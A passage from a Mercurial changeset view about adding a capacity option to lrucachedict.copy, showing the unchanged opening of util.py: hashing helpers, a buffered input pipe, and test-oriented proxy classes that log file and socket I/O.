util: ability to change capacity when copying lrucachedict...
Gregory Szorc
r39601:2dcc68c7 default
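
A sketch of what this changeset enables (illustrative, not part of the diff
below): lrucachedict.copy() gains an optional ``capacity`` argument, so a
cache can be cloned into a larger or smaller cache while preserving its
insertion/access order.

    d = lrucachedict(4)
    for i in range(4):
        d['key%d' % i] = 'value%d' % i
    d2 = d.copy()            # same capacity (4) as the original
    d3 = d.copy(capacity=2)  # smaller copy; retains the 2 newest entries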
@@ -1,3885 +1,3898 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 try:
130 130 recvfds = osutil.recvfds
131 131 except AttributeError:
132 132 pass
133 133
134 134 # Python compatibility
135 135
136 136 _notset = object()
137 137
138 138 def bitsfrom(container):
139 139 bits = 0
140 140 for bit in container:
141 141 bits |= bit
142 142 return bits
143 143
144 144 # Python 2.6 still has deprecation warnings enabled by default. We do not
145 145 # want to display anything to the standard user, so detect if we are running
146 146 # tests and only use Python deprecation warnings in that case.
147 147 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 148 if _dowarn:
149 149 # explicitly unfilter our warning for python 2.7
150 150 #
151 151 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 152 # However, the module name set through PYTHONWARNINGS is matched exactly, so
153 153 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
154 154 # makes the whole PYTHONWARNINGS approach useless for our use case.
155 155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 158 if _dowarn and pycompat.ispy3:
159 159 # silence warning emitted by passing user string to re.sub()
160 160 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 161 r'mercurial')
162 162 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 163 DeprecationWarning, r'mercurial')
164 164 # TODO: reinvent imp.is_frozen()
165 165 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 166 DeprecationWarning, r'mercurial')
167 167
168 168 def nouideprecwarn(msg, version, stacklevel=1):
169 169 """Issue an python native deprecation warning
170 170
171 171 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 172 """
173 173 if _dowarn:
174 174 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 175 " update your code.)") % version
176 176 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177 177
178 178 DIGESTS = {
179 179 'md5': hashlib.md5,
180 180 'sha1': hashlib.sha1,
181 181 'sha512': hashlib.sha512,
182 182 }
183 183 # List of digest types from strongest to weakest
184 184 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185 185
186 186 for k in DIGESTS_BY_STRENGTH:
187 187 assert k in DIGESTS
188 188
189 189 class digester(object):
190 190 """helper to compute digests.
191 191
192 192 This helper can be used to compute one or more digests given their name.
193 193
194 194 >>> d = digester([b'md5', b'sha1'])
195 195 >>> d.update(b'foo')
196 196 >>> [k for k in sorted(d)]
197 197 ['md5', 'sha1']
198 198 >>> d[b'md5']
199 199 'acbd18db4cc2f85cedef654fccc4a4d8'
200 200 >>> d[b'sha1']
201 201 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 202 >>> digester.preferred([b'md5', b'sha1'])
203 203 'sha1'
204 204 """
205 205
206 206 def __init__(self, digests, s=''):
207 207 self._hashes = {}
208 208 for k in digests:
209 209 if k not in DIGESTS:
210 210 raise error.Abort(_('unknown digest type: %s') % k)
211 211 self._hashes[k] = DIGESTS[k]()
212 212 if s:
213 213 self.update(s)
214 214
215 215 def update(self, data):
216 216 for h in self._hashes.values():
217 217 h.update(data)
218 218
219 219 def __getitem__(self, key):
220 220 if key not in DIGESTS:
221 221 raise error.Abort(_('unknown digest type: %s') % key)
222 222 return nodemod.hex(self._hashes[key].digest())
223 223
224 224 def __iter__(self):
225 225 return iter(self._hashes)
226 226
227 227 @staticmethod
228 228 def preferred(supported):
229 229 """returns the strongest digest type in both supported and DIGESTS."""
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 if k in supported:
233 233 return k
234 234 return None
235 235
236 236 class digestchecker(object):
237 237 """file handle wrapper that additionally checks content against a given
238 238 size and digests.
239 239
240 240 d = digestchecker(fh, size, {'md5': '...'})
241 241
242 242 When multiple digests are given, all of them are validated.
243 243 """
244 244
245 245 def __init__(self, fh, size, digests):
246 246 self._fh = fh
247 247 self._size = size
248 248 self._got = 0
249 249 self._digests = dict(digests)
250 250 self._digester = digester(self._digests.keys())
251 251
252 252 def read(self, length=-1):
253 253 content = self._fh.read(length)
254 254 self._digester.update(content)
255 255 self._got += len(content)
256 256 return content
257 257
258 258 def validate(self):
259 259 if self._size != self._got:
260 260 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 261 (self._size, self._got))
262 262 for k, v in self._digests.items():
263 263 if v != self._digester[k]:
264 264 # i18n: first parameter is a digest name
265 265 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 266 (k, v, self._digester[k]))
267 267
268 268 try:
269 269 buffer = buffer
270 270 except NameError:
271 271 def buffer(sliceable, offset=0, length=None):
272 272 if length is not None:
273 273 return memoryview(sliceable)[offset:offset + length]
274 274 return memoryview(sliceable)[offset:]
275 275
276 276 _chunksize = 4096
277 277
278 278 class bufferedinputpipe(object):
279 279 """a manually buffered input pipe
280 280
281 281 Python will not let us use buffered IO and lazy reading with 'polling' at
282 282 the same time. We cannot probe the buffer state and select will not detect
283 283 that data are ready to read if they are already buffered.
284 284
285 285 This class lets us work around that by implementing its own buffering
286 286 (allowing efficient readline) while offering a way to know if the buffer is
287 287 empty from the output (allowing collaboration of the buffer with polling).
288 288
289 289 This class lives in the 'util' module because it makes use of the 'os'
290 290 module from the python stdlib.
291 291 """
292 292 def __new__(cls, fh):
293 293 # If we receive a fileobjectproxy, we need to use a variation of this
294 294 # class that notifies observers about activity.
295 295 if isinstance(fh, fileobjectproxy):
296 296 cls = observedbufferedinputpipe
297 297
298 298 return super(bufferedinputpipe, cls).__new__(cls)
299 299
300 300 def __init__(self, input):
301 301 self._input = input
302 302 self._buffer = []
303 303 self._eof = False
304 304 self._lenbuf = 0
305 305
306 306 @property
307 307 def hasbuffer(self):
308 308 """True is any data is currently buffered
309 309
310 310 This will be used externally a pre-step for polling IO. If there is
311 311 already data then no polling should be set in place."""
312 312 return bool(self._buffer)
313 313
314 314 @property
315 315 def closed(self):
316 316 return self._input.closed
317 317
318 318 def fileno(self):
319 319 return self._input.fileno()
320 320
321 321 def close(self):
322 322 return self._input.close()
323 323
324 324 def read(self, size):
325 325 while (not self._eof) and (self._lenbuf < size):
326 326 self._fillbuffer()
327 327 return self._frombuffer(size)
328 328
329 329 def unbufferedread(self, size):
330 330 if not self._eof and self._lenbuf == 0:
331 331 self._fillbuffer(max(size, _chunksize))
332 332 return self._frombuffer(min(self._lenbuf, size))
333 333
334 334 def readline(self, *args, **kwargs):
335 335 if 1 < len(self._buffer):
336 336 # this should not happen because both read and readline end with a
337 337 # _frombuffer call that collapses it.
338 338 self._buffer = [''.join(self._buffer)]
339 339 self._lenbuf = len(self._buffer[0])
340 340 lfi = -1
341 341 if self._buffer:
342 342 lfi = self._buffer[-1].find('\n')
343 343 while (not self._eof) and lfi < 0:
344 344 self._fillbuffer()
345 345 if self._buffer:
346 346 lfi = self._buffer[-1].find('\n')
347 347 size = lfi + 1
348 348 if lfi < 0: # end of file
349 349 size = self._lenbuf
350 350 elif 1 < len(self._buffer):
351 351 # we need to take previous chunks into account
352 352 size += self._lenbuf - len(self._buffer[-1])
353 353 return self._frombuffer(size)
354 354
355 355 def _frombuffer(self, size):
356 356 """return at most 'size' data from the buffer
357 357
358 358 The data are removed from the buffer."""
359 359 if size == 0 or not self._buffer:
360 360 return ''
361 361 buf = self._buffer[0]
362 362 if 1 < len(self._buffer):
363 363 buf = ''.join(self._buffer)
364 364
365 365 data = buf[:size]
366 366 buf = buf[len(data):]
367 367 if buf:
368 368 self._buffer = [buf]
369 369 self._lenbuf = len(buf)
370 370 else:
371 371 self._buffer = []
372 372 self._lenbuf = 0
373 373 return data
374 374
375 375 def _fillbuffer(self, size=_chunksize):
376 376 """read data to the buffer"""
377 377 data = os.read(self._input.fileno(), size)
378 378 if not data:
379 379 self._eof = True
380 380 else:
381 381 self._lenbuf += len(data)
382 382 self._buffer.append(data)
383 383
384 384 return data
385 385
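# Illustrative sketch (editor's addition, not part of util.py): the intended
# interplay between bufferedinputpipe and polling. ``hasbuffer`` is consulted
# first, because select() cannot see data that is already buffered:
#
#     import select
#     pipe = bufferedinputpipe(rawpipe)   # rawpipe: a hypothetical os pipe
#     if not pipe.hasbuffer:
#         select.select([pipe], [], [])   # safe: nothing hidden in a buffer
#     line = pipe.readline()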
386 386 def mmapread(fp):
387 387 try:
388 388 fd = getattr(fp, 'fileno', lambda: fp)()
389 389 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 390 except ValueError:
391 391 # Empty files cannot be mmapped, but mmapread should still work. Check
392 392 # if the file is empty, and if so, return an empty buffer.
393 393 if os.fstat(fd).st_size == 0:
394 394 return ''
395 395 raise
396 396
397 397 class fileobjectproxy(object):
398 398 """A proxy around file objects that tells a watcher when events occur.
399 399
400 400 This type is intended to only be used for testing purposes. Think hard
401 401 before using it in important code.
402 402 """
403 403 __slots__ = (
404 404 r'_orig',
405 405 r'_observer',
406 406 )
407 407
408 408 def __init__(self, fh, observer):
409 409 object.__setattr__(self, r'_orig', fh)
410 410 object.__setattr__(self, r'_observer', observer)
411 411
412 412 def __getattribute__(self, name):
413 413 ours = {
414 414 r'_observer',
415 415
416 416 # IOBase
417 417 r'close',
418 418 # closed is a property
419 419 r'fileno',
420 420 r'flush',
421 421 r'isatty',
422 422 r'readable',
423 423 r'readline',
424 424 r'readlines',
425 425 r'seek',
426 426 r'seekable',
427 427 r'tell',
428 428 r'truncate',
429 429 r'writable',
430 430 r'writelines',
431 431 # RawIOBase
432 432 r'read',
433 433 r'readall',
434 434 r'readinto',
435 435 r'write',
436 436 # BufferedIOBase
437 437 # raw is a property
438 438 r'detach',
439 439 # read defined above
440 440 r'read1',
441 441 # readinto defined above
442 442 # write defined above
443 443 }
444 444
445 445 # We only observe some methods.
446 446 if name in ours:
447 447 return object.__getattribute__(self, name)
448 448
449 449 return getattr(object.__getattribute__(self, r'_orig'), name)
450 450
451 451 def __nonzero__(self):
452 452 return bool(object.__getattribute__(self, r'_orig'))
453 453
454 454 __bool__ = __nonzero__
455 455
456 456 def __delattr__(self, name):
457 457 return delattr(object.__getattribute__(self, r'_orig'), name)
458 458
459 459 def __setattr__(self, name, value):
460 460 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461 461
462 462 def __iter__(self):
463 463 return object.__getattribute__(self, r'_orig').__iter__()
464 464
465 465 def _observedcall(self, name, *args, **kwargs):
466 466 # Call the original object.
467 467 orig = object.__getattribute__(self, r'_orig')
468 468 res = getattr(orig, name)(*args, **kwargs)
469 469
470 470 # Call a method on the observer of the same name with arguments
471 471 # so it can react, log, etc.
472 472 observer = object.__getattribute__(self, r'_observer')
473 473 fn = getattr(observer, name, None)
474 474 if fn:
475 475 fn(res, *args, **kwargs)
476 476
477 477 return res
478 478
479 479 def close(self, *args, **kwargs):
480 480 return object.__getattribute__(self, r'_observedcall')(
481 481 r'close', *args, **kwargs)
482 482
483 483 def fileno(self, *args, **kwargs):
484 484 return object.__getattribute__(self, r'_observedcall')(
485 485 r'fileno', *args, **kwargs)
486 486
487 487 def flush(self, *args, **kwargs):
488 488 return object.__getattribute__(self, r'_observedcall')(
489 489 r'flush', *args, **kwargs)
490 490
491 491 def isatty(self, *args, **kwargs):
492 492 return object.__getattribute__(self, r'_observedcall')(
493 493 r'isatty', *args, **kwargs)
494 494
495 495 def readable(self, *args, **kwargs):
496 496 return object.__getattribute__(self, r'_observedcall')(
497 497 r'readable', *args, **kwargs)
498 498
499 499 def readline(self, *args, **kwargs):
500 500 return object.__getattribute__(self, r'_observedcall')(
501 501 r'readline', *args, **kwargs)
502 502
503 503 def readlines(self, *args, **kwargs):
504 504 return object.__getattribute__(self, r'_observedcall')(
505 505 r'readlines', *args, **kwargs)
506 506
507 507 def seek(self, *args, **kwargs):
508 508 return object.__getattribute__(self, r'_observedcall')(
509 509 r'seek', *args, **kwargs)
510 510
511 511 def seekable(self, *args, **kwargs):
512 512 return object.__getattribute__(self, r'_observedcall')(
513 513 r'seekable', *args, **kwargs)
514 514
515 515 def tell(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'tell', *args, **kwargs)
518 518
519 519 def truncate(self, *args, **kwargs):
520 520 return object.__getattribute__(self, r'_observedcall')(
521 521 r'truncate', *args, **kwargs)
522 522
523 523 def writable(self, *args, **kwargs):
524 524 return object.__getattribute__(self, r'_observedcall')(
525 525 r'writable', *args, **kwargs)
526 526
527 527 def writelines(self, *args, **kwargs):
528 528 return object.__getattribute__(self, r'_observedcall')(
529 529 r'writelines', *args, **kwargs)
530 530
531 531 def read(self, *args, **kwargs):
532 532 return object.__getattribute__(self, r'_observedcall')(
533 533 r'read', *args, **kwargs)
534 534
535 535 def readall(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'readall', *args, **kwargs)
538 538
539 539 def readinto(self, *args, **kwargs):
540 540 return object.__getattribute__(self, r'_observedcall')(
541 541 r'readinto', *args, **kwargs)
542 542
543 543 def write(self, *args, **kwargs):
544 544 return object.__getattribute__(self, r'_observedcall')(
545 545 r'write', *args, **kwargs)
546 546
547 547 def detach(self, *args, **kwargs):
548 548 return object.__getattribute__(self, r'_observedcall')(
549 549 r'detach', *args, **kwargs)
550 550
551 551 def read1(self, *args, **kwargs):
552 552 return object.__getattribute__(self, r'_observedcall')(
553 553 r'read1', *args, **kwargs)
554 554
555 555 class observedbufferedinputpipe(bufferedinputpipe):
556 556 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557 557
558 558 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 559 bypass ``fileobjectproxy``. Because of this, we need to make
560 560 ``bufferedinputpipe`` aware of these operations.
561 561
562 562 This variation of ``bufferedinputpipe`` can notify observers about
563 563 ``os.read()`` events. It also re-publishes other events, such as
564 564 ``read()`` and ``readline()``.
565 565 """
566 566 def _fillbuffer(self):
567 567 res = super(observedbufferedinputpipe, self)._fillbuffer()
568 568
569 569 fn = getattr(self._input._observer, r'osread', None)
570 570 if fn:
571 571 fn(res, _chunksize)
572 572
573 573 return res
574 574
575 575 # We use different observer methods because the operation isn't
576 576 # performed on the actual file object but on us.
577 577 def read(self, size):
578 578 res = super(observedbufferedinputpipe, self).read(size)
579 579
580 580 fn = getattr(self._input._observer, r'bufferedread', None)
581 581 if fn:
582 582 fn(res, size)
583 583
584 584 return res
585 585
586 586 def readline(self, *args, **kwargs):
587 587 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588 588
589 589 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 590 if fn:
591 591 fn(res)
592 592
593 593 return res
594 594
595 595 PROXIED_SOCKET_METHODS = {
596 596 r'makefile',
597 597 r'recv',
598 598 r'recvfrom',
599 599 r'recvfrom_into',
600 600 r'recv_into',
601 601 r'send',
602 602 r'sendall',
603 603 r'sendto',
604 604 r'setblocking',
605 605 r'settimeout',
606 606 r'gettimeout',
607 607 r'setsockopt',
608 608 }
609 609
610 610 class socketproxy(object):
611 611 """A proxy around a socket that tells a watcher when events occur.
612 612
613 613 This is like ``fileobjectproxy`` except for sockets.
614 614
615 615 This type is intended to only be used for testing purposes. Think hard
616 616 before using it in important code.
617 617 """
618 618 __slots__ = (
619 619 r'_orig',
620 620 r'_observer',
621 621 )
622 622
623 623 def __init__(self, sock, observer):
624 624 object.__setattr__(self, r'_orig', sock)
625 625 object.__setattr__(self, r'_observer', observer)
626 626
627 627 def __getattribute__(self, name):
628 628 if name in PROXIED_SOCKET_METHODS:
629 629 return object.__getattribute__(self, name)
630 630
631 631 return getattr(object.__getattribute__(self, r'_orig'), name)
632 632
633 633 def __delattr__(self, name):
634 634 return delattr(object.__getattribute__(self, r'_orig'), name)
635 635
636 636 def __setattr__(self, name, value):
637 637 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638 638
639 639 def __nonzero__(self):
640 640 return bool(object.__getattribute__(self, r'_orig'))
641 641
642 642 __bool__ = __nonzero__
643 643
644 644 def _observedcall(self, name, *args, **kwargs):
645 645 # Call the original object.
646 646 orig = object.__getattribute__(self, r'_orig')
647 647 res = getattr(orig, name)(*args, **kwargs)
648 648
649 649 # Call a method on the observer of the same name with arguments
650 650 # so it can react, log, etc.
651 651 observer = object.__getattribute__(self, r'_observer')
652 652 fn = getattr(observer, name, None)
653 653 if fn:
654 654 fn(res, *args, **kwargs)
655 655
656 656 return res
657 657
658 658 def makefile(self, *args, **kwargs):
659 659 res = object.__getattribute__(self, r'_observedcall')(
660 660 r'makefile', *args, **kwargs)
661 661
662 662 # The file object may be used for I/O. So we turn it into a
663 663 # proxy using our observer.
664 664 observer = object.__getattribute__(self, r'_observer')
665 665 return makeloggingfileobject(observer.fh, res, observer.name,
666 666 reads=observer.reads,
667 667 writes=observer.writes,
668 668 logdata=observer.logdata,
669 669 logdataapis=observer.logdataapis)
670 670
671 671 def recv(self, *args, **kwargs):
672 672 return object.__getattribute__(self, r'_observedcall')(
673 673 r'recv', *args, **kwargs)
674 674
675 675 def recvfrom(self, *args, **kwargs):
676 676 return object.__getattribute__(self, r'_observedcall')(
677 677 r'recvfrom', *args, **kwargs)
678 678
679 679 def recvfrom_into(self, *args, **kwargs):
680 680 return object.__getattribute__(self, r'_observedcall')(
681 681 r'recvfrom_into', *args, **kwargs)
682 682
683 683 def recv_into(self, *args, **kwargs):
684 684 return object.__getattribute__(self, r'_observedcall')(
685 685 r'recv_into', *args, **kwargs)
686 686
687 687 def send(self, *args, **kwargs):
688 688 return object.__getattribute__(self, r'_observedcall')(
689 689 r'send', *args, **kwargs)
690 690
691 691 def sendall(self, *args, **kwargs):
692 692 return object.__getattribute__(self, r'_observedcall')(
693 693 r'sendall', *args, **kwargs)
694 694
695 695 def sendto(self, *args, **kwargs):
696 696 return object.__getattribute__(self, r'_observedcall')(
697 697 r'sendto', *args, **kwargs)
698 698
699 699 def setblocking(self, *args, **kwargs):
700 700 return object.__getattribute__(self, r'_observedcall')(
701 701 r'setblocking', *args, **kwargs)
702 702
703 703 def settimeout(self, *args, **kwargs):
704 704 return object.__getattribute__(self, r'_observedcall')(
705 705 r'settimeout', *args, **kwargs)
706 706
707 707 def gettimeout(self, *args, **kwargs):
708 708 return object.__getattribute__(self, r'_observedcall')(
709 709 r'gettimeout', *args, **kwargs)
710 710
711 711 def setsockopt(self, *args, **kwargs):
712 712 return object.__getattribute__(self, r'_observedcall')(
713 713 r'setsockopt', *args, **kwargs)
714 714
715 715 class baseproxyobserver(object):
716 716 def _writedata(self, data):
717 717 if not self.logdata:
718 718 if self.logdataapis:
719 719 self.fh.write('\n')
720 720 self.fh.flush()
721 721 return
722 722
723 723 # Simple case writes all data on a single line.
724 724 if b'\n' not in data:
725 725 if self.logdataapis:
726 726 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 727 else:
728 728 self.fh.write('%s> %s\n'
729 729 % (self.name, stringutil.escapestr(data)))
730 730 self.fh.flush()
731 731 return
732 732
733 733 # Data with newlines is written to multiple lines.
734 734 if self.logdataapis:
735 735 self.fh.write(':\n')
736 736
737 737 lines = data.splitlines(True)
738 738 for line in lines:
739 739 self.fh.write('%s> %s\n'
740 740 % (self.name, stringutil.escapestr(line)))
741 741 self.fh.flush()
742 742
743 743 class fileobjectobserver(baseproxyobserver):
744 744 """Logs file object activity."""
745 745 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 746 logdataapis=True):
747 747 self.fh = fh
748 748 self.name = name
749 749 self.logdata = logdata
750 750 self.logdataapis = logdataapis
751 751 self.reads = reads
752 752 self.writes = writes
753 753
754 754 def read(self, res, size=-1):
755 755 if not self.reads:
756 756 return
757 757 # Python 3 can return None from reads at EOF instead of empty strings.
758 758 if res is None:
759 759 res = ''
760 760
761 761 if size == -1 and res == '':
762 762 # Suppress pointless read(-1) calls that return
763 763 # nothing. These happen _a lot_ on Python 3, and there
764 764 # doesn't seem to be a better workaround to have matching
765 765 # Python 2 and 3 behavior. :(
766 766 return
767 767
768 768 if self.logdataapis:
769 769 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770 770
771 771 self._writedata(res)
772 772
773 773 def readline(self, res, limit=-1):
774 774 if not self.reads:
775 775 return
776 776
777 777 if self.logdataapis:
778 778 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779 779
780 780 self._writedata(res)
781 781
782 782 def readinto(self, res, dest):
783 783 if not self.reads:
784 784 return
785 785
786 786 if self.logdataapis:
787 787 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 788 res))
789 789
790 790 data = dest[0:res] if res is not None else b''
791 791 self._writedata(data)
792 792
793 793 def write(self, res, data):
794 794 if not self.writes:
795 795 return
796 796
797 797 # Python 2 returns None from some write() calls. Python 3 (reasonably)
798 798 # returns the integer bytes written.
799 799 if res is None and data:
800 800 res = len(data)
801 801
802 802 if self.logdataapis:
803 803 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
804 804
805 805 self._writedata(data)
806 806
807 807 def flush(self, res):
808 808 if not self.writes:
809 809 return
810 810
811 811 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
812 812
813 813 # For observedbufferedinputpipe.
814 814 def bufferedread(self, res, size):
815 815 if not self.reads:
816 816 return
817 817
818 818 if self.logdataapis:
819 819 self.fh.write('%s> bufferedread(%d) -> %d' % (
820 820 self.name, size, len(res)))
821 821
822 822 self._writedata(res)
823 823
824 824 def bufferedreadline(self, res):
825 825 if not self.reads:
826 826 return
827 827
828 828 if self.logdataapis:
829 829 self.fh.write('%s> bufferedreadline() -> %d' % (
830 830 self.name, len(res)))
831 831
832 832 self._writedata(res)
833 833
834 834 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
835 835 logdata=False, logdataapis=True):
836 836 """Turn a file object into a logging file object."""
837 837
838 838 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
839 839 logdata=logdata, logdataapis=logdataapis)
840 840 return fileobjectproxy(fh, observer)
841 841
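# Illustrative sketch (editor's addition): wrapping an open file object so
# every I/O call is mirrored to a log handle. ``logfh`` and ``fh`` are
# assumed to be already-open file objects:
#
#     proxy = makeloggingfileobject(logfh, fh, b'myfile',
#                                   logdata=True, logdataapis=True)
#     proxy.write(b'hello')   # logs "myfile> write(5) -> 5: hello"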
842 842 class socketobserver(baseproxyobserver):
843 843 """Logs socket activity."""
844 844 def __init__(self, fh, name, reads=True, writes=True, states=True,
845 845 logdata=False, logdataapis=True):
846 846 self.fh = fh
847 847 self.name = name
848 848 self.reads = reads
849 849 self.writes = writes
850 850 self.states = states
851 851 self.logdata = logdata
852 852 self.logdataapis = logdataapis
853 853
854 854 def makefile(self, res, mode=None, bufsize=None):
855 855 if not self.states:
856 856 return
857 857
858 858 self.fh.write('%s> makefile(%r, %r)\n' % (
859 859 self.name, mode, bufsize))
860 860
861 861 def recv(self, res, size, flags=0):
862 862 if not self.reads:
863 863 return
864 864
865 865 if self.logdataapis:
866 866 self.fh.write('%s> recv(%d, %d) -> %d' % (
867 867 self.name, size, flags, len(res)))
868 868 self._writedata(res)
869 869
870 870 def recvfrom(self, res, size, flags=0):
871 871 if not self.reads:
872 872 return
873 873
874 874 if self.logdataapis:
875 875 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
876 876 self.name, size, flags, len(res[0])))
877 877
878 878 self._writedata(res[0])
879 879
880 880 def recvfrom_into(self, res, buf, size, flags=0):
881 881 if not self.reads:
882 882 return
883 883
884 884 if self.logdataapis:
885 885 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
886 886 self.name, size, flags, res[0]))
887 887
888 888 self._writedata(buf[0:res[0]])
889 889
890 890 def recv_into(self, res, buf, size=0, flags=0):
891 891 if not self.reads:
892 892 return
893 893
894 894 if self.logdataapis:
895 895 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
896 896 self.name, size, flags, res))
897 897
898 898 self._writedata(buf[0:res])
899 899
900 900 def send(self, res, data, flags=0):
901 901 if not self.writes:
902 902 return
903 903
904 904 self.fh.write('%s> send(%d, %d) -> %d' % (
905 905 self.name, len(data), flags, len(res)))
906 906 self._writedata(data)
907 907
908 908 def sendall(self, res, data, flags=0):
909 909 if not self.writes:
910 910 return
911 911
912 912 if self.logdataapis:
913 913 # Returns None on success. So don't bother reporting return value.
914 914 self.fh.write('%s> sendall(%d, %d)' % (
915 915 self.name, len(data), flags))
916 916
917 917 self._writedata(data)
918 918
919 919 def sendto(self, res, data, flagsoraddress, address=None):
920 920 if not self.writes:
921 921 return
922 922
923 923 if address:
924 924 flags = flagsoraddress
925 925 else:
926 926 flags = 0
927 927
928 928 if self.logdataapis:
929 929 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
930 930 self.name, len(data), flags, address, res))
931 931
932 932 self._writedata(data)
933 933
934 934 def setblocking(self, res, flag):
935 935 if not self.states:
936 936 return
937 937
938 938 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
939 939
940 940 def settimeout(self, res, value):
941 941 if not self.states:
942 942 return
943 943
944 944 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
945 945
946 946 def gettimeout(self, res):
947 947 if not self.states:
948 948 return
949 949
950 950 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
951 951
952 952 def setsockopt(self, res, level, optname, value):
953 953 if not self.states:
954 954 return
955 955
956 956 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
957 957 self.name, level, optname, value, res))
958 958
959 959 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
960 960 logdata=False, logdataapis=True):
961 961 """Turn a socket into a logging socket."""
962 962
963 963 observer = socketobserver(logh, name, reads=reads, writes=writes,
964 964 states=states, logdata=logdata,
